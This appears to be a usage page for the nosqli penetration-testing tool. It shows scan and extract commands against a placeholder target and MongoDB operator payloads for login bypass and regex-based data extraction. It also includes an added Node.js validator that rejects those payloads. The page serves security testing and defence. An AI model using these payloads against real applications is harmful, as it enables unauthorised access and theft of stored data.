Description
nosqli is a command-line tool for detecting and exploiting NoSQL injection vulnerabilities, primarily targeting MongoDB. It automates detection of authentication bypass, data exfiltration, and boolean/timing-based injection in web applications.
Installation
BASH
go install github.com/Charlie-belmer/nosqli@latest
Basic Usage
BASH
# Test a URL for NoSQL injection
nosqli scan -t "https://target.com/login" -p "username,password"
# Automatic detection
nosqli scan -t "https://target.com/api/users?id=1"
Advanced Usage
BASH
# POST request testing
nosqli scan -t "https://target.com/login" -m POST \
-d '{"username":"admin","password":"test"}' \
-H "Content-Type: application/json"
# Extract data
nosqli extract -t "https://target.com/api/users?id=1" -p "id"
# Custom proxy (through Burp)
nosqli scan -t "https://target.com/login" --proxy http://127.0.0.1:8080
# Verbose output
nosqli scan -t "https://target.com/login" -v
Common Payloads
JSON
// Authentication bypass
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
// Data extraction
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
// Iterate: ^a, ^ab, ^abc... to extract full values
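The payloads above only work when the server passes a parsed JSON object straight into a MongoDB query. As an added example (not part of nosqli or the original page), this Node.js check accepts credentials only as plain strings and rejects the payload shapes listed; `findOperatorKeys`, `validateLogin` and the sample inputs are hypothetical names and constructed data.

```javascript
// Added example (not nosqli code); function names are hypothetical.
// MongoDB reads an object value such as {"$ne": ""} as a query operator,
// so credential fields are accepted only as plain strings.
// Collect paths of keys that start with "$" or contain "." at any depth.
function findOperatorKeys(value, path = "") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...findOperatorKeys(v, `${path}[${i}]`)));
  } else if (value !== null && typeof value === "object") {
    for (const [key, child] of Object.entries(value)) {
      const here = path ? `${path}.${key}` : key;
      if (key.startsWith("$") || key.includes(".")) hits.push(here);
      hits.push(...findOperatorKeys(child, here));
    }
  }
  return hits;
}
// Validate a raw request body; returns { ok, reason } or { ok, creds }.
function validateLogin(rawBody, fields = ["username", "password"]) {
  let body;
  try {
    body = JSON.parse(rawBody);
  } catch (err) {
    return { ok: false, reason: "invalid JSON" };
  }
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    return { ok: false, reason: "body must be a JSON object" };
  }
  const operators = findOperatorKeys(body);
  if (operators.length > 0) {
    return { ok: false, reason: `operator key at ${operators.join(", ")}` };
  }
  const creds = {};
  for (const f of fields) {
    if (typeof body[f] !== "string" || body[f].length === 0) {
      return { ok: false, reason: `${f} must be a non-empty string` };
    }
    creds[f] = body[f]; // copy only the expected fields
  }
  return { ok: true, creds };
}
// Constructed samples: the payload shapes from "Common Payloads" plus a normal login.
const samples = [
  '{"username": {"$ne": ""}, "password": {"$ne": ""}}',
  '{"username": "admin", "password": {"$gt": ""}}',
  '{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}',
  '{"username": "alice", "password": "correct horse"}',
];
const checkSamples = () => samples.map((s) => validateLogin(s).ok);
console.log(checkSamples());
```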
Common Workflows
BASH
# Test login form for NoSQL bypass
nosqli scan -t "https://target.com/api/login" -m POST \
-d '{"email":"test@test.com","password":"test"}' \
-H "Content-Type: application/json"
# Combine with manual testing
# If nosqli confirms injection, manually extract data via regex-based exfil